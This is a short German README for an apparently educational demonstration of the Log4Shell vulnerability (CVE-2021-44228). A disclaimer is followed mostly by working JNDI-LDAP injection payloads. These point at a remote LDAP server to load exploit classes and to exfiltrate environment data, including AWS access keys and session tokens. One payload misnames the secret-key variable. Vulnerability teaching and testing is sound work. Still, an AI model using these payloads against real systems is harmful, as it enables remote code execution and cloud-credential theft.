
Pädagogische Demonstration der Log4Shell-Schwachstelle (CVE-2021-44228) mit JNDI-LDAP-Payloads für experimentelle Tests auf Ihren eigenen Systemen.
Dieses Projekt ist eine Demonstration der Funktionsweise der Sicherheitslücke Log4Shell.
Diese Schwachstelle wird in der CVE-2021-44228 beschrieben.
Das Projekt dient ausschließlich zu Lehrzwecken. Es sollte nur auf Ihrem eigenen System und nur zu experimentellen Zwecken verwendet werden.
Jede Ausführung erfolgt auf eigene Gefahr. Der Autor übernimmt keinerlei Haftung für Zwischenfälle, die durch die Ausführung des Projekts entstehen.
ldap_server=i-09cd4f41e5a2b1d66.eu-west-3.compute.internal:1389
hello '${jndi:ldap://'"${ldap_server}"'/run=log4shell.Exploit}'
hello '${jndi:ldap://'"${ldap_server}"'/run=log4shell.ExploitP,msg=my friend}'
hello '${jndi:ldap://'"${ldap_server}"'/run=log4shell.aws.FetchCreds}'
hello '${jndi:ldap://'"${ldap_server}"'/log=PATH:${env:USER}}'
hello '${jndi:ldap://'"${ldap_server}"'/log=PATH:${env:PATH}}'
hello '${jndi:ldap://'"${ldap_server}"'/log=os=${java:os}}'
hello '${jndi:ldap://'"${ldap_server}"'/log=aws_credentials,AWS_ACCESS_KEY_ID=${env:AWS_ACCESS_KEY_ID},AWS_SECRET_ACCESS_KEY=${env:AWS_SECRET_ACCESS_ID},AWS_SESSION_TOKEN=${env:AWS_SESSION_TOKEN}}'